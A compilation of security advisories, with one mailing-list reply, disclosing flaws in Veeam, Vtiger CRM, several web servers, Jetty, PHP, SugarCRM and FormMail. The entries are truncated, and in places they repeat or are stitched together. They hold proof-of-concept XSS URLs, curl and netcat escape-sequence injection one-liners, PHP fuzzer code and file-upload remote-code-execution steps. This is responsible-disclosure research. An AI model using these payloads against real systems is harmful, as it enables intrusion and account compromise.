Veeam Backup & Replication Local Privilege Escalation Vulnerability
Veeam Backup & Replication Local Privilege Escalation Vulnerability Name Sensitive Data Exposure in Veem Backup Systems Affected Veeam Backup & Replication (B) v6, v6.5, v7, v8 Severity High 7.9/10 ImpactCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L Vendorhttp://www.veeam.com/ Advisory http://www.ush.it/team/ush/hack-veeam_6_7_8/veeam.txt Authors Pasquale "sid" Fiorillo (sid AT ush DOT it) Francesco "ascii" Ongaro (ascii AT ush DOT it) Antonio "s4tan" Parata (s4tan AT ush DOT it) Date 20151002 I. BACKGROUND Veeam Software provides backup, disaster recovery and virtualization management software for the VMware and Hyper-V environments. In 2012 Veeam gained more than 1200 employees worldwide, from 10 employees in 2008. It has more than 157'000 customers, 33'000 partners and 80 top industry awards and claims to be the "#1 VM Backup" solution after it gained traction against competitors like Backup Exec and Tivoli Storage Manager. Veeam Backup & Replication is the foundation of many Veeam products, like Veeam Availability Suite and Veeam One. ISGroup is an Italian Information Security boutique, we found this 0day issue while performing a Penetration Test for a customer, you can discover more about ISGroup by visiting http://www.isgroup.biz/. Responsible disclosure with Veeam: Veeam has no public security@ contact and we worked with them through the ticket system opening a case using one of our customer's assistance contract. We were unable to escape from the sternness of this type of communication and move to PGP emails. Their response anyway was pretty prompt, we spoke first with Denis Bodnar and then escalate to Fred Bozhanov, Veeam Support Management. He managed communication with the developers. We advise Veeam to give some of their senior developers a "security team" mandate and to expose such team to external, direct, communication. The people we spoke to did their best and were extremely kind but they must be supported by a corporate process. Prior vulnerabilities in Veeam: It's very difficult to say if Veeam had previous vulnerabilities, there are no CVE assigned to this vendor both on Nist and to it's CPE (cpe:/:veeam). Information to customers of the vulnerability is shown in the "other" section of the changelog: "Removed weakly encrypted username and password logging from guest processing components using networkless (VIX) guest interaction mode. Veeam thanks Pasquale Fiorillo and Francesco Ongaro of ISGroup for vulnerability discovery.". The latest version of the software at the time of writing can be obtained from: http://www.veeam.com/kb2068 http://forums.veeam.com/veeam-backup-replication-f2/8-0-common-issues-and-fixes-t24157.html#p130849 http://www.veeam.com/vmware-esx-backup.html II. DESCRIPTION The vulnerability allows a local Windows user, even with low privileges as the ones provided to an anonymous IIS's virtualhost user, to access Veeam Backup logfiles that include a double-base64 encoded version of the password used by Veeam to run. The affected component is VeeamVixProxy, created by default on installation and the user must be a privileged Local Administrator or a Domain Administrator. For example the wizard for adding a VMware or Hyper-V Backup Proxy explicitly state "Type in an account with local administrator privileges on the server you are adding. Use DOMAIN\USER format for domain accounts, or HOST\USER for local accounts.". We conservatively refer to this issue as a Local Administrator Privilege Escalation but the use of Domain Administrator accounts is not discouraged, if not advised, and we saw this pattern in our customer’s production infrastructures. TLDR: Anything able to read VeeamVixProxy logfiles, world readable by default, can escalate to Local or Domain Administrator. III. ANALYSIS Veeam Backup & Replication (B) v6, v6.5, v7, v8 store VeeamVixProxy logfiles in a directory accessible by Everyone and with permissions that make them readable by Everyone (Everyone is, in the Microsoft Windows terminology, the equivalent of the Unix’s nobody user). Such logs, that are continuously generated, contain a Local or Domain Administration user and password in an easily reversible (obfuscated) format. In versions of Veeam prior to 8 a bug prevented log rotation [3,4], on older systems there could be a large amount of logs and thus an extensive history of past and current Local or Domain Administrator credentials. A) Logfiles readable by Everyone As shown in http://www.veeam.com/kb1789 the default log path is Windows Server 2003: %allusersprofile%\Application Data\Veeam\Backup Windows Server 2008 and up: %programdata%\Veeam\Backup Our evidence is for Windows Server 2003, access to the needed files are guaranteed to the Wi
Vtiger CRM 5.2.0 Multiple Vulnerabilities
) Vulnerabilities (post-auth, reflected) A reflected XSS vulnerability exists in Vtiger CRM version 5.2.0. The vulnerability can be exploited against authenticated users only. The vulnerability is present due to insecure statements in the script modules/Settings/GetFieldInfo.php that reflect unfiltered user inputs inside the page output. PoC URL that exploits this vulnerability: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- http://127.0.0.1/vtigercrm/index.php?module=Settingsaction=GetFieldInfolabel =%3Cscript%3Ealert(123)%3C/scrip%3E --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- IV. DETECTION Vtiger CRM 5.2.0 and possibly earlier versions are vulnerable. Vtiger CRM can be identified using the following google dork: - intitle:vtiger CRM 5 - Commercial Open Source CRM V. WORKAROUND No fix available. VI. VENDOR RESPONSE We were able to reproduce the issues you reported on 5.2, and are working on releasing a security update shortly. We expect to release this update within the next 3 to 4 weeks, after running some more tests. VII. CVE INFORMATION CVE-2010-3909 [A] CVE-2010-3910 [B] CVE-2010-3911 [C, D] VIII. DISCLOSURE TIMELINE 20101009 Bugs discovered 20101012 First vendor contact 20101012 Vendor response (Sreenivas Kanumuru) 20101012 Contacted Steven M. Christey (mitre.org) 20101012 CVEs assigned by Steven M. Christey 20100102 Vtiger CRM team confirms vulnerability (Sreenivas Kanumuru) 20101015 Advisory release scheduled for 20101115 20101116 Advisory released IX. REFERENCES [1] Vtiger CRM 5.0.4 Multiple Vulnerabilities http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt X. CREDIT Giovanni evilaliv3 Pellerano, Alessandro jekil Tanasi are credited with the discovery of this vulnerability. Giovanni evilaliv3 Pellerano web site: http://www.ush.it/, http://www.evilaliv3.org/ mail: evilaliv3 AT ush DOT it Alessandro jekil Tanasi web site: http://www.tanasi.it/ mail: alessandro AT tanasi DOT it XI. LEGAL NOTICES Copyright (c) 2010 Francesco ascii Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection
Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection Name Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection Systems Affected nginx 0.7.64 Varnish 2.0.6 Cherokee 0.99.30 mini_httpd 1.19 thttpd 2.25b0 WEBrick 1.3.1 Orion 2.0.7 AOLserver 4.5.1 Yaws 1.85 Boa 0.94.14rc21 Severity Medium Impact (CVSSv2) Medium 5/10, vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) Vendorhttp://www.nginx.net/ http://varnish.projects.linpro.no/ http://www.cherokee-project.com/ http://www.ruby-lang.org/ http://www.acme.com/software/thttpd/ http://www.acme.com/software/mini_httpd/ http://www.orionserver.com/ http://www.aolserver.com/ http://yaws.hyber.org/ http://www.boa.org/ Advisory http://www.ush.it/team/ush/hack_httpd_escape/adv.txt Authors Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it) Alessandro jekil Tanasi (alessandro AT tanasi DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Date 20100110 I. BACKGROUND nginx is a HTTP and reverse proxy server written by Igor Sysoev. Varnish is a state-of-the-art, high-performance HTTP accelerator. Cherokee is a very fast, flexible and easy to configure Web Server. thttpd is a simple, small, portable, fast, and secure HTTP server. mini_httpd is a small HTTP server. WEBrick is a Ruby library providing simple HTTP web server services. Orion Application Server is a pure java application-server. AOLserver is America Online's Open-Source web server. Yaws is a HTTP high perfomance 1.1 webserver. Boa is a single-tasking HTTP server. II. DESCRIPTION Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa are subject to logs escape sequence injection vulnerabilites. Escape sequences are special characters sequences that are used to instruct the terminal to perform special operations like executing commands [4, 5] or dumping the buffer to a file [6, 7]. When the webserver is executed in foreground in a pty or when the logfiles are viewed with tools like cat or tail such control chars reach the terminal and are executed. III. ANALYSIS Summary: A) nginx log escape sequence injection (Affected versions: 0.7.64 and probably earlier versions) B) Varnish log escape sequence injection (Affected versions: 2.0.6 and probably earlier versions) C) Cherokee log escape sequence injection (Affected versions: 0.99.30 and probably earlier versions) D) thttpd log escape sequence injection (Affected versions: thttpd/2.25b and probably earlier versions) E) mini_httpd log escape sequence injection (Affected versions: 1.19 and probably earlier versions) F) WEBrick log escape sequence injection (Affected versions: 1.3.1 and probably earlier versions) G) Orion log escape sequence injection (Affected versions: 2.0.7 and probably earlier versions) H) AOLserver log escape sequence injection (Affected versions: 4.5.1 and probably earlier versions) I) Yaws log escape sequence injection (Affected versions: 1.85 and probably earlier versions) L) Boa log escape sequence injection (Affected versions: 0.94.14rc21 and probably earlier versions) A) nginx log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d payload nc localhost 80 payload B) Varnish log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. xterm varnishlog echo -en GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d payload nc localhost 80 payload C) Cherokee log escape sequence injection The following Proof Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a D) thttpd log escape sequence injection The following Proof Of Concept can be used in order to verify the vulnerability. echo -en GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d payload nc localhost 80 payload E) mini_httpd log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify the vulnerability. curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a echo -en GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d payload nc localhost 80 payload F) WEBrick log escape sequence injection One of the following two Proofs Of Concept can be used in order to verify
Jetty 6.x and 7.x Multiple Vulnerabilities
Jetty 6.x and 7.x Multiple Vulnerabilities Name Multiple Vulnerabilities in Jetty Systems Affected Jetty 7.0.0 and earlier versions Severity Medium Impact (CVSSv2) Medium 5/10, vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) Vendorhttp://www.mortbay.org/jetty/ Advisory http://www.ush.it/team/ush/hack-jetty6x7x/jetty-adv.txt Authors Francesco ascii Ongaro (ascii AT ush DOT it) Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it) Antonio s4tan Parata (s4tan AT ush DOT it) Date 20091024 I. BACKGROUND Jetty is an open-source project providing a HTTP server, HTTP client and javax.servlet container. These 100% java components are full-featured, standards based, small foot print, embeddable, asynchronous and enterprise scalable. Jetty is dual licensed under the Apache Licence 2.0 and/or the Eclipse Public License 1.0. Jetty is free for commercial use and distribution under the terms of either of those licenses. Jetty is used in a wide variety of projects and products: embedded in phones, in tools like the the eclipse IDE, in frameworks like GWT, in application servers like Apache Geronimo and in huge clusters like Yahoo's Hadoop cluster. The latest version at the time of writing can be obtained from: http://dist.codehaus.org/jetty/jetty-7.0.0/jetty-hightide-7.0.0.v2009100 5.tar.gz Running Jetty 7.0.x is very easy, from the documentation page at: http://docs.codehaus.org/display/JETTY/Running+Jetty-7.0.x - From an unpacked release directory of jetty-7, the server can be started with the command: java -jar start.jar - This will start a HTTP server on port 8080 and deploy the test web application at: http://localhost:8080/test II. DESCRIPTION Multiple Vulnerabilities exist in Jetty software. III. ANALYSIS Summary: A) Dump Servlet information leak (Affected versions: Any) B) FORM Authentication demo information leak (Affected versions: Any) C) JSP Dump reflected XSS (Affected versions: Any) D) Session Dump Servlet stored XSS (Affected versions: Any) E) Cookie Dump Servlet escape sequence injection (Affected versions: Any) F) Http Content-Length header escape sequence injection (Affected versions: Any) G) Cookie Dump Servlet stored XSS (Affected versions: =6.1.20) H) WebApp JSP Snoop page XSS (Affected versions: =6.1.21) A) Dump Servlet information leak (Affected versions: Any) By requesting the demo Dump Servlet at an URL like /test/dump/ it's possible to obtain a number of details about the remote Jetty instance. Variables: getMethod, getContentLength, getContentType, getRequestURI, getRequestURL, getContextPath, getServletPath, getPathInfo, getPathTranslated, getQueryString, getProtocol, getScheme, getServerName, getServerPort, getLocalName, getLocalAddr, getLocalPort, getRemoteUser, getRemoteAddr, getRemoteHost, getRemotePort, getRequestedSessionId, isSecure(), isUserInRole(admin), getLocale, getLocales, getLocales Plus a dump of all the HTTP request headers, the request parameters and much more. Five forms can be used to perform a series of functionality tests including: - Form to generate GET content - Form to generate POST content - Form to generate UPLOAD content - Form to set Cookie - Form to get Resource While this is a feature we think that demo utilities should be disabled by default. Many live deployments of Jetty exhibit demo pages that leak important information and expose several vulnerabilites. B) FORM Authentication demo information leak (Affected versions: Any) An example application often erroneously deployed is the FORM Authentication demo (logon.html and logonError.html pages) that uses the standard j_security_check component. By requesting the /test/logon.html page it's possible to detect the presence of a Jetty installation. As noted before we think that demo utilities should be disabled by default. C) JSP Dump reflected XSS (Affected versions: Any) It has been found that the demo JSP Dump feature is vulnerable to reflected Cross Site Scripting attacks. This can be replicated by issuing a GET request to the /test/jsp/dump.jsp page: /test/jsp/dump.jsp?%3Cscript%3Ealert(%22hello%20world%22)%3C/script%3E Any GET key and value that reach the remote is reflected unencoded. The problem resides in the jsp/dump.jsp file from the webapps/test.war archive. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- htmlhead %@ page import=java.util.Enumeration % /headbody h1JSP Dump/h1 table border=1 trthRequest URI:/thtd%= request.getRequestURI() %/td/tr trthServletPath:/thtd%= request.getServletPath() %/td/tr trthPathInfo:/thtd%= request.getPathInfo() %/td/tr % Enumeration e =request.getParameterNames(); while(e.hasMoreElements()) { String name = (String)e.nextElement(); % tr thgetParameter(%= name %)/th td%= request.getParameter(name) %/td/tr % } % /table /body/html --8--8--8--8
Vtiger CRM 5.0.4 Multiple Vulnerabilities
Vtiger CRM 5.0.4 Multiple Vulnerabilities Name Multiple Vulnerabilities in Vtiger CRM Systems Affected Vtiger CRM 5.0.4 and possibly earlier versions Severity Medium Impact (CVSSv2) Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P) Vendorhttp://www.vtigercrm.com Advisory http://www.ush.it/team/ush/hack-vtigercrm_504/vtigercrm_504.txt Authors Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it) Antonio s4tan Parata (s4tan AT ush DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Date 20090818 I. BACKGROUND Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. II. DESCRIPTION Multiple Vulnerabilities exist in Vtiger CRM software. Some of the technical issues highlighted in this advisory are part of a wider publication, PHP filesystem attack vectors - Take Two, and are generic to applications written in the PHP language: http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/ III. ANALYSIS Summary: A) Remote Code Execution (RCE) Vulnerability B) Cross Site Request Forgery (CSRF) Vulnerabilities C) Local File Inclusion (LFI) Vulnerability D) Cross Side Scripting (XSS) Vulnerability A) Remote Code Execution (Windows Only) Vulnerability A Remote Code Execution vulnerability exists in Vtiger CRM version 5.0.4. In order to exploit this vulnerability an account on the CRM system is required. The vulnerability resides in the Compose Mail section. The software permits sending email with attachments and offers a draft save feature. When this feature is requested and an attachment is specified, the saveForwardAttachments validation routine is called. This routine involves some security checks to handle uploaded files, it does blacklist extension checking and if a bad extension is detected the txt extension is appended to the file-name. The following is the specific section: --8--8--8--8--8--8--8-Vtiger CRM 5.0.4 Multiple Vulnerabilities Name Multiple Vulnerabilities in Vtiger CRM Systems Affected Vtiger CRM 5.0.4 and possibly earlier versions Severity Medium Impact (CVSSv2) Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P) Vendorhttp://www.vtigercrm.com Advisory Authors Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it) Antonio s4tan Parata (s4tan AT ush DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Date 20090818 I. BACKGROUND Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. II. DESCRIPTION Multiple Vulnerabilities exist in Vtiger CRM software. Some of the technical issues highlighted in this advisory are part of a wider publication, PHP filesystem attack vectors - Take Two, and are generic to applications written in the PHP language: http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/ III. ANALYSIS Summary: A) Remote Code Execution (RCE) Vulnerability B) Cross Site Request Forgery (CSRF) Vulnerabilities C) Local File Inclusion (LFI) Vulnerability D) Cross Side Scripting (XSS) Vulnerability A) Remote Code Execution (Windows Only) Vulnerability A Remote Code Execution vulnerability exists in Vtiger CRM version 5.0.4. In order to exploit this vulnerability an account on the CRM system is required. The vulnerability resides in the Compose Mail section. The software permits sending email with attachments and offers a draft save feature. When this feature is requested and an attachment is specified, the saveForwardAttachments validation routine is called. This routine involves some security checks to handle uploaded files, it does blacklist extension checking and if a bad extension is detected the txt extension is appended to the file-name. The following is the specific section: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- $ext_pos = strrpos($binFile, .); $ext = substr($binFile, $ext_pos + 1); if (in_array(strtolower($ext), $upload_badext)) { $binFile .= .txt; } --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- It's known that in some circostances (for example when the PHP handler is configured using AddType/Action/AddHandler globally, eg. not inside an Apache's Files/FilesMatch directive) blacklisting is not enough as files in the form of filename.php.foo will be mapped back to PHP anyway (since foo is not explicitly defined in the MIME map and Apache will try to guess the filetype by its own). Beside this known issue we want to point out a less known exploitation methodology that works on Windows hosts. First the attacker has to find the name of the file that was uploaded in the attachment list files. Vtiger CRM saves files
PHP filesystem attack vectors - Take Two
PHP filesystem attack vectors - Take Two Name PHP filesystem attack vectors - Take Two Systems Affected PHP and PHP+Suhosin Vendorhttp://www.php.net/ Advisory http://www.ush.it/team/ush/hack-phpfs/phpfs_mad_2.txt Authors Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it) Antonio s4tan Parata (s4tan AT ush DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Alessandro jekil Tanasi (alessandro AT tanasi DOT it) Date 20090725 I)Introduction II) PHP arbitrary Local File Inclusion testing III) PHP arbitrary Local File Inclusion results IV) PHP arbitrary File Open testing V)PHP arbitrary File Open results VI) PHP arbitrary Remote File Upload testing VII) PHP arbitrary Remote File Upload results VIII) Conclusions IX) References I) Introduction This is the second part and continuation of our previous PHP filesystem attack vectors [1] research. Working with s4tan and ascii on the SugarCRM 5.2.0e Remote Code Execution advisory [2] we noticed a strange behaviour on Windows OS: trying to upload a file named a.php. results in just a.php. Analyzing this we noticed that every time an application, or manually, was trying to open or save a file with one ore more dots at the end, Windows was not denying the operation, but it was removing the dots in a transparent way. Mindful readers probably have already spotted the issue. We wanted to take our time for a deeper investigation about what normalization issues were available and how to take advantage of them in order to exploit arbitrary local file inclusion/handling and uploads functionalities (not only on Windows OS but also on GNU/Linux and *BSD). Below you can find the sources of two simple academic fuzzers, later results are discussed and finally POCs and conclusions are proposed. II) PHP arbitrary Local File Inclusion testing This tests include(), include_once(), require(), require_once() and similiar functions. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- alfi_fuzzer.php: ?php error_reporting(0); $InterestingFile = test_alfi.php; $fh = @fopen($InterestingFile, 'w+'); fwrite($fh, ?php ?); fclose($fh); for ($i = 1; $i 256; $i++) { $chri = chr($i); for ($j = 0; $j 256; $j++) { $chrj = chr($j); for ($k = 0; $k 256; $k++) { $chrk = chr($k); if($chri.$chrj.$chrk == '://') continue; if ($j == 0) $FuzzyFile = $InterestingFile.$chri; else if ($k == 0) $FuzzyFile = $InterestingFile.$chri.$chrj; else $FuzzyFile = $InterestingFile.$chri.$chrj.$chrk; if(include($FuzzyFile)) { print($i. .$j. .$k. [.$FuzzyFile.]\n); fclose($fh); } if($j == 0) break; } } } unlink($InterestingFile); ? --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- Note: This code and the one that will be presented in section IV only makes use of chars from the ASCII extended table (256 chars) to limit the combinations because our intent was to test not only a malicious ending char but a whole ending extension of 3 bytes. A better fuzzer would include UTF-8. In the test we also do not consider \x00, because this vector is already known [3, 4]. III) PHP arbitrary Local File Inclusion results --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- PHP 5.2.10-pl0-Gentoo PHPFS_MAD2 $ php alfi_fuzzer.php 47 46 46 [test_alfi.php/.] 47 47 47 [test_alfi.php//.] --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- PHP 5.2.10-pl0-Gentoo + Suhosin-Patch 0.9.27 PHPFS_MAD2 $ php alfi_fuzzer.php [ NO RESULTS ] --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- PHP 5.2.10-FreeBSD 7.3 + Suhosin-Patch 0.9.7 PHPFS_MAD2 $ php alfi_fuzzer.php [ NO RESULTS ] --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8- PHP 5.3.0 Windows XP (WampServer 2.0i install) C:\PHPFS_MAD2 php alfi_fuzzer.php ! Valid chars are: \x20 ( ), \x22 (), \x2E (.), \x3C (), \x3E () ! Valid strings are all combinations of the above chars. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- PHP 5.3.0 Windows Server 2008 (WampServer 2.0i install) C:\PHPFS_MAD2 php alfi_fuzzer.php ! Valid chars are: \x20 ( ), \x22 (), \x2E (.), \x3C (), \x3E () ! Valid strings are all combinations of the above chars. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- IV) PHP arbitrary File Open testing This tests fopen() and similiar functions. --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- afo_fuzzer.php: ?php error_reporting(0); $MaliciousFile = test_afo.php; for ($i = 1; $i 256; $i++) { $chri = chr($i); for ($j = 0; $j 256; $j++) { $chrj = chr($j); for ($k = 0; $k 256; $k++) { if ($j == 0) $FuzzyFile = $MaliciousFile.$chri; else if ($k == 0) $FuzzyFile = $MaliciousFile.$chri.$chrj; else $FuzzyFile = $MaliciousFile.$chri.$chrj.chr($k); $fh = @fopen($FuzzyFile, 'w+'); if ($fh != FALSE) { fwrite($fh, $FuzzyFile); fclose($fh); if (file_exists($MaliciousFile
SugarCRM 5.2.0e Remote Code Execution
SugarCRM 5.2.0e Remote Code Execution Name Remote Code Execution in SugarCRM Systems Affected Sugar CRM 5.2.0e and possibly earlier versions Severity High Impact (CVSSv2) High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P) Vendorhttp://www.sugarcrm.com Advisory http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt Authors Antonio s4tan Parata (s4tan AT ush DOT it) Francesco ascii Ongaro (ascii AT ush DOT it) Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it) Date 20090613 I. BACKGROUND From the SugarCRM web site: Sugar Express is designed for individuals and small companies. Core CRM features help employees get on the same page while more complex functionality is stripped away. Sugar Express is ideal for providing a single view of the customer from the initial marketing campaign through the sales cycle and on to customer support. With Sugar Express, companies have a single system of truth for managing customer interactions.. II. DESCRIPTION A Remote Code Execution Vulnerability exists in SugarCRM software. III. ANALYSIS Summary: A Remote Code Execution issue has been found in SugarCRM version 5.2.0e. In order to exploit this vulnerability an account on the system is required. The vulnerability resides in the Compose Email section. The software permits sending email with attachments (if not disabled by the administrator). When the name of the file is specified, a validation routine is called: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- function safeAttachmentName($filename) { global $sugar_config; $badExtension = false; //get position of last . in file name $file_ext_beg = strrpos($filename, .); $file_ext = ; //get file extension if($file_ext_beg 0) { $file_ext = substr($filename, $file_ext_beg + 1); } //check to see if this is a file with extension located in badext foreach($sugar_config['upload_badext'] as $badExt) { if(strtolower($file_ext) == strtolower($badExt)) { //if found, then append with .txt and break out of lookup $filename = $filename . .txt; $badExtension = true; break; // no need to look for more } // if } // foreach return $badExtension; } --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- This routine checks if the extension of the filename is blacklisted, if so the .txt extension is appended to the filename. However there is a coding error: the function assumes that the filename (extension excluded) is at least one char long, this assumption is derived from the statement: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- if($file_ext_beg 0) --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- Of course this is a bad assumption, if we set the whole filename to .php than the check is skipped and a void extension is assumed. Because void extensions are not in the blacklist, no futher extension is added to the filename. After this check a file is created on the filesystem in the form idfilename. Where id is an alphanumeric string. With the trick illustrated we are able to create a file with .php extension. To do this upload a new file attachment and set the filename to .php. After this the attacker has to find the name of the file that was uploaded in the attachment list files. To obtaint the real filename look in the HTML response for a string like: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- input value=6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php name=email_atta chment0 id=email_attachment10 type=hidden --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- The real filename in this case is 6e25aba0-9dc4-2a57-8bae-4a1317b35d47. php. Now the attacker has to find the directory where the file resides. Again searching the HTML page for the attribute assigned_user_id reveals the needed information: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- a href=index.php?module=Emailsaction=ListViewassigned_user_id=abf7c7 7b-2f71-8071-63ba-4a131068e9a2type=archived --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- At this point the attacker has all the informations to invoke the uploaded file. Filename: 6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php Assigned user id: abf7c77b-2f71-8071-63ba-4a131068e9a2 To directly request it issue a request to: --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- http://www.example.com/cache/modules/Emails/abf7c77b-2f71-8071-63ba-4a13 1068e9a2/6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php --8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8--8-- As final note: if the user is administrator, assigned_user_id is always 1. IV. DETECTION SugarCRM 5.2.0e and possibly earlier versions are vulnerable. V. WORKAROUND Upgrade to latest version 5.2.0f VI. VENDOR RESPONSE We have fixed the issue
Re: FormMail 1.92 Multiple Vulnerabilities
David Cantrell wrote: which to me looks like he's already addressed the issue by recommending that you use NMS formmail if you care about the quality of the code and any bugs. Dear David, telling people to use a different software doesn't automatically fix issues. As we tested FormMail and want to warn people who deployed FormMail and will deploy FormMail we posted an advisory for FormMail. Hope this open your mind. Bye, ascii ush.it
FormMail 1.92 Multiple Vulnerabilities
FormMail 1.92 Multiple Vulnerabilities Name Multiple Vulnerabilities in FormMail Systems Affected FormMail 1.92 and possibly earlier versions Severity Medium Impact (CVSSv2) Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) Vendorhttp://www.scriptarchive.com/formmail.html Advisory http://www.ush.it/team/ush/hack-formmail_192/adv.txt Authors Francesco ascii Ongaro (ascii AT ush DOT it) Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it) Antonio s4tan Parata (s4tan AT ush DOT it) Date 20090511 I. BACKGROUND FormMail is a generic HTML form to e-mail gateway that parses the results of any form and sends them to the specified users. This script has many formatting and operational options, most of which can be specified within each form, meaning you don't need programming knowledge or multiple scripts for multiple forms. This also makes FormMail the perfect system-wide solution for allowing users form-based user feedback capabilities without the risks of allowing freedom of CGI access. There are several downloading options available below and more information on this script can be found in the Readme file. FormMail is quite possibily the most used CGI program on the internet, having been downloaded over 2,000,000 times since 1997. II. DESCRIPTION Multiple Vulnerabilities exist in FormMail software. III. ANALYSIS Summary: A) Prelude to the vulnerabities B) Cross Site Scripting C) HTTP Response Header Injection D) HTTP Response Splitting A) Prelude to the vulnerabities What follows is the code used to validate the user input: Line 283: $safeConfig array definition. --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- foreach $field (keys %Config) { $safeConfig{$field} = clean_html($Config{$field}); } --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- Line 518: definition of clean_html function, used to generate the $safeConfig array from $Config. --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- # This function will convert , , and to their HTML equivalents. sub clean_html { local $value = $_[0]; $value =~ s/\/\amp;/g; $value =~ s//\lt;/g; $value =~ s//\gt;/g; $value =~ s//\quot;/g; return $value; } --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- These functions are not always applied to the user input and don't protect against all the attack vectors (as URI or DOM XSS that can work also if encoded), this is why various vulnerabilities exist. B) Cross Site Scripting vulnerability Line 293: the redirect variable is used to write the location header value. Its value is not filtered so it's possible to perform both HTTP Header Injection and an HTTP Response Splitting attacks. Since Header Injection is one of the most versatile attack vectors we could use it (like downgrade it) to perform a Cross Site Scripting attack but it would not represent a different vulnerability. In this case we are already inside a Location response header and it's possible to perform an XSS without splitting the response and using the standard Apache page for the 302 Found HTTP status. --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- # If redirect option is used, print the redirectional location header. if ($Config{'redirect'}) { print Location: $safeConfig{'redirect'}\n\n; } --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- XSS vulnerability example: http://127.0.0.1/formmail.pl?recipient=evilal...@ush.itsubject=1redire ct=javascript:alert(%27USH%27); Response: $ curl -kis http://127.0.0.1/formmail.pl?recipient=evilal...@ush.itsub ject=1redirect=javascript:alert(%27USH%27); --8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-8-- HTTP/1.1 302 Found Date: Sat, 11 Apr 2009 14:12:11 GMT Server: Apache Location: javascript:alert('USH'); 